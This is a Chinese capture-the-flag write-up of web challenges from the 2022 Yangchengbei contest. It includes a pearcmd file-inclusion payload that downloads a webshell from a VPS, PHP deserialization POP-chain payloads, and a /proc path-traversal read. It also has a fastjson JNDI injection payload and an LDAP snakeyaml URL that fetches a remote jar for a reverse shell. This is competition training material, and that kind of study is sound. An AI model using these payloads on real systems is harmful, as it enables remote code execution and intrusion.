羊城杯2022 部分web

WEB

rce_me

 <?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
         foreach($blacklist as $blackword){
           if(stristr($var, $blackword)) return False;
    }
    return True;
}  
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
} 

pearcmd.php文件包含,过滤了常用的几个命令选项,但还有个download。写个马丢到vps上,pear的过滤使用url编码绕过。

/?+download+http://vps:7999/asd.php+&file=/usr/local/lib/php/%70%65%61%72%63%6d%64.php

羊城杯2022 部分web_第1张图片

date -f /flag

step_by_step-v3

本来想着bypass 那个正则的 结果发现flag在phpinfo里面

$a = new cheng();
$b = new bei();
$c = new yang();
$d = new cheng();
$e = new yang();
$d->c1 = $e;
$c->y1 = $d;
$b->b1 = $c;
$a->c1 = $b;

echo (serialize($a));
ans=O%3A5%3A%22cheng%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A3%3A%22bei%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A4%3A%22yang%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A5%3A%22cheng%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22yang%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BN%3B%7D%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D

羊城杯2022 部分web_第2张图片

?file=php://filter/read=convert.base64-encode//resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/hint.php

羊城杯2022 部分web_第3张图片

羊城杯2022 部分web_第4张图片

读phpinfo的链子,就上面文件包含前一段

$a=new cheng();
$b=new bei();
$c=new yang();
$c->y1="phpinfo";
$a->c1=$b;
$b->b1=$c;
echo serialize($a);

Safepop

去年浙江省大学生省赛原题

Pop链思路为class B -> class A::__get -> class Fun::__call -> class Test::getFlag
羊城杯2022 部分web_第5张图片

Exp:


class Fun{
    private $func;
    public function __construct(){
    $this->func = [new Test,'getFlag'];
    }
}

class Test{
    public function getFlag(){
        //system("cat /flag?");
    }
}

class A{
    public $a;
}

class B{
    public $p;
}

$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;
$b->p = "c";

echo base64_encode(serialize($b));

为了防止私有属性不可见字符在复制中消失,选择生成base64 再在burp中修改对象属性个数,并urlencode保留不可见字符
羊城杯2022 部分web_第6张图片

Payload:

/?pop=%4f%3a%31%3a%22%42%22%3a%32%3a%7b%73%3a%31%3a%22%70%22%3b%73%3a%31%3a%22%63%22%3b%73%3a%31%3a%22%61%22%3b%4f%3a%31%3a%22%41%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%46%75%6e%22%3a%32%3a%7b%73%3a%39%3a%22%00%46%75%6e%00%66%75%6e%63%22%3b%61%3a%32%3a%7b%69%3a%30%3b%4f%3a%34%3a%22%54%65%73%74%22%3a%30%3a%7b%7d%69%3a%31%3b%73%3a%37%3a%22%67%65%74%46%6c%61%67%22%3b%7d%7d%7d%7d

羊城杯2022 部分web_第7张图片

simple_json(复现)

jar包解压反编译看到test那有个测试用例,就是jndi注入了。是用的fastjson去实例化题目自己写的JNDIService类触发。

自己用org.apache.naming.factory.BeanFactory 类打没打成功,没搞明白为啥。使用JNDIInject-1.2-SNAPSHOT.jar这个工具去打高版本利用,用fuzz模块去看看可用的利用链。

{
	"content": {
		"@type": "ycb.simple_json.service.JNDIService",
		"target": "ldap://vps:7999/fuzzbyDNS/w8wlk1.dnslog.cn"
	},
	"msg": {
		"$ref": "$.content.context"
	}
}

羊城杯2022 部分web_第8张图片

用工具给的对应payload源码修改一下命令 生成jar包 然后反弹shell即可

ldap://ip:7999/snakeyaml/http://ip:7777/yaml-payload.jar

MISC

签到

rot13+base32

羊城杯2022 部分web_第9张图片

你可能感兴趣的:(ctf)